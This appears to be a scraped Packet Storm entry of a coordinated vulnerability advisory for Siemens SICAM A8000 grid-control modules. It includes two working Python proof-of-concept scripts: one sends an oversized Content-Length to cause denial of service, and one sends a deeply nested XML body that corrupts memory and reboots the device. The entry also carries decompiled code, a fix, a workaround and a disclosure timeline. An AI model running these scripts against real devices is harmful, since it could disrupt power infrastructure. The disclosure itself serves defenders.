{“lastseen”:”2026-04-15T16:57:46″,”description”:”Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities…”,”published”:”2026-04-15T00:00:00″,”modified”:”2026-04-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption”,”source”:””,”references”:””,”id”:”PACKETSTORM:218981″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-27664″],”sourceData”:”CyberDanube Security Research 20260408-1\\n ——————————————————————————-\\n title| Multiple Vulnerabilities\\n product| Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012\\n vulnerable version| \\u003c=V25.30\\n fixed version| V26.10\\n CVE number| CVE-2026-27664\\n impact| High\\n homepage| https:\/\/siemens.com\/\\n found| 18.12.2025\\n by| S. Dietz\\n | (Office Vienna)\\n | CyberDanube Security Research\\n | Vienna\\n |\\n | This research was conducted in cooperation with\\n | VERBUND Digital Power during a penetration test.\\n |\\n | https:\/\/www.cyberdanube.com\\n ——————————————————————————-\\n \\n Vendor description\\n ——————————————————————————-\\n \\”Our purpose: We create technology to transform the everyday, for everyone.\\n By combining the real and the digital worlds, we can help accelerate both\\n digitalization and sustainability – so our customers around the world can\\n become more competitive, resilient and sustainable.\\”\\n \\n Source: https:\/\/www.siemens.com\/global\/en\/company\/about.html\\n \\n Vulnerable versions\\n ——————————————————————————-\\n Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) \/ \\u003c=V25.30\\n Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) \/ \\u003c=V25.30\\n Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) \/ \\u003c=V25.31\\n Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) \/ \\u003c=V25.31\\n \\n See also the vendor advisory:\\n https:\/\/cert-portal.siemens.com\/productcert\/html\/ssa-246443.html\\n \\n Vulnerability overview\\n ——————————————————————————-\\n 1) Unauthenticated Denial of Service\\n A crafted POST request with a large Content-Length and multipart boundary\\n without matching body seems to make the parser wait for more data. As long as\\n the connection is open, no other user can interact with the service. IHI00.elf\\n and RTUM85.elf are impacted by this.\\n \\n 2) Unauthenticated Memory Corruption (CVE-2026-27664)\\n A crafted POST request with a malicious XML body can be send to write null\\n bytes to an arbitrary memory address after the buffers location. This may lead\\n to a denial of service or remote code execution. This impacts the IHI00.elf as\\n well as the RTUM85.elf binary.\\n \\n Proof of Concept\\n ——————————————————————————-\\n 1) Unauthenticated Denial of Service\\n The following python script can be used to temporarily impact the availability\\n of the device.\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n #!\/bin\/env python3\\n # S. Dietz \\u003cfitfrost4\\u003e\\n from pwn import *\\n \\n IP = \\”localhost\\”\\n PORT = 8080\\n COMP = \\”ihi\\”\\n path = b\\”\\”\\n \\n if args.IP:\\n IP = args.IP\\n if args.PORT:\\n PORT = int(args.PORT)\\n if args.COMP:\\n COMP = args.COMP\\n if COMP == \\”rtum85\\”:\\n path = b\\”\/sicweb-ajax\/rtum85\/pwned\\”\\n elif COMP == \\”ihi\\”:\\n path = b\\”\/sicweb-ajax\/auth\\”\\n \\n req = b\\”\\”\\n req += b\\”POST \\” + path + b\\” HTTP\/1.1\\\\r\\\\n\\”\\n req += b\\”Content-Length: \\” + str(13371337).encode() + b\\”\\\\r\\\\n\\”\\n req += b\\”Content-Type: multipart\/form-data; boundary=–pwned\\\\r\\\\n\\”\\n req += b\\”User-Agent: Mozilla\/5.0\\\\r\\\\n\\”\\n req += b\\”Accept: *\/*\\\\r\\\\n\\”\\n req += b\\”Accept-Encoding: gzip, deflate, br\\\\r\\\\n\\”\\n req += b\\”Connection: keep-alive\\\\r\\\\n\\”\\n req += b\\”\\\\r\\\\n\\”\\n \\n log.info(req)\\n \\n with remote(IP, PORT) as io:\\n io.send(req)\\n io.recv(1337)\\n \\n ——————————————————————————-\\n 2) Unauthenticated Memory Corruption (CVE-2026-27664)\\n The following python script can be used to crash the IHI00.elf application on\\n the device. As a watchdog (ISV00.elf) is active, the device reboots.\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n #!\/bin\/env python3\\n # S. Dietz \\u003cfitfrost4\\u003e\\n from pwn import *\\n \\n IP = \\”localhost\\”\\n PORT = 8080\\n \\n if args.IP:\\n IP = args.IP\\n \\n if args.PORT:\\n PORT = int(args.PORT)\\n \\n buf = b’\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\\\n’\\n buf += b\\”\\u003cx\\u003e\\” * 0xa0000\\n buf += b\\”\\u003c\/x\\u003e\\”\\n buf += b\\”\\\\r\\\\n\\”\\n \\n body = buf\\n req = b\\”\\”\\n req += b\\”POST \/sicweb-ajax\/auth HTTP\/1.1\\\\r\\\\n\\”\\n req += b\\”Content-Length: \\” + str(len(body)).encode() + b\\”\\\\r\\\\n\\”\\n req += b\\”sec-ch-ua: \\\\\\”Chromium\\\\\\”;v=\\\\\\”133\\\\\\”, \\\\\\”Not(A:Brand\\\\\\”;v=\\\\\\”99\\\\\\”\\\\r\\\\n\\”\\n req += b\\”Content-Type: application\/xml\\\\r\\\\n\\”\\n req += b\\”User-Agent: Mozilla\/5.0\\\\r\\\\n\\”\\n req += b\\”Accept: *\/*\\\\r\\\\n\\”\\n req += b\\”Accept-Encoding: gzip, deflate, br\\\\r\\\\n\\”\\n req += b\\”Connection: keep-alive\\\\r\\\\n\\”\\n req += b\\”\\\\r\\\\n\\”\\n req += body\\n \\n with remote(IP, PORT) as io:\\n io.send(req)\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n \\n The issue arises due to a logic error in the XML parsing. Both binaries use\\n libexpat which export the function XML_SetElementHandler() which takes a\\n user-defined structure as well as two function pointer which are executed when\\n an opening or closing tag occurs. When looking at start() it can be observed\\n that the tag_depth is tracked. If the depth is greater than 15, the return\\n value gets set to -2 and the tag_depth gets incremented.\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n 0052b0d4 void start(struct userdata* userData, char const* xmlchar)\\n 0052b0da int32_t tag_depth = userData-\\u003etag_depth\\n 0052b0e2 int32_t* entry_r2\\n 0052b0e2\\n 0052b0e2 if (tag_depth != 0)\\n 0052b0e6 if (tag_depth != 1)\\n 0052b0fa if (tag_depth u\\u003e 0xf)\\n 0052b0fa goto too_big\\n […]\\n 0052b152 too_big:\\n 0052b152 userData-\\u003eretval = -2\\n 0052b154 userData-\\u003etag_depth = tag_depth + 1\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n \\n When a matching closing tag occurs, end() is executed. Due to a missing retval\\n check, the userData access happens out-of-bounds resulting in an arbitrary\\n null-byte overflow\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n 0052a570 void end(struct userdata* userData, char const* xmlchar)\\n […]\\n 0052a584\\n 0052a588 int32_t tag_depth = userData-\\u003etag_depth\\n 0052a58c userData-\\u003etag_depth = tag_depth – 1\\n 0052a58c\\n 0052a58e if (tag_depth != 1)\\n 0052a598 *(userData + ((tag_depth – 2) \\u003c\\u003c 2) + 4) = 0\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n Further investigations showed that the bug allows an attacker to write a word\\n of null-bytes to arbitrary memory after the buffers location, including the\\n stack. Due to the extensive usage of shared libraries, this results in a large\\n attack surface.\\n ——————————————————————————-\\n \\n \\n Solution\\n ——————————————————————————-\\n Install the latest version available.\\n \\n \\n Workaround\\n ——————————————————————————-\\n Restrict network access to the device in the infrastructure.\\n \\n Recommendation\\n ——————————————————————————-\\n CyberDanube recommends to perform a white-box security assessment of the SICAM\\n A8000 master module devices.\\n \\n \\n Contact Timeline\\n ——————————————————————————-\\n 2026-02-24: Contacting Siemens ProductCERT\\n 2026-03-04: Siemens ProductCERT confirmed the issue but said the the DoS is a\\n valid behavior for resource conservation.\\n 2026-03-09: Asking for name and organization for acknowledgement. In addition,\\n gave an estimation regarding the update timeline.\\n 2026-03-26: Siemens ProductCERT publishes the advisory SSA-246443.\\n 2026-04-08: Coordinated release of security advisory.\\n \\n \\n Web: https:\/\/www.cyberdanube.com\\n Twitter: https:\/\/twitter.com\/cyberdanube\\n Mail: research at cyberdanube dot com\\n \\n EOF S. Dietz \/ @2025″,”sourceHref”:”https:\/\/packetstorm.news\/download\/218981″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/SC:N\/VI:N\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218981\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-15T16:57:46″,”description”:”Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities…”,”published”:”2026-04-15T00:00:00″,”modified”:”2026-04-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-47250","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n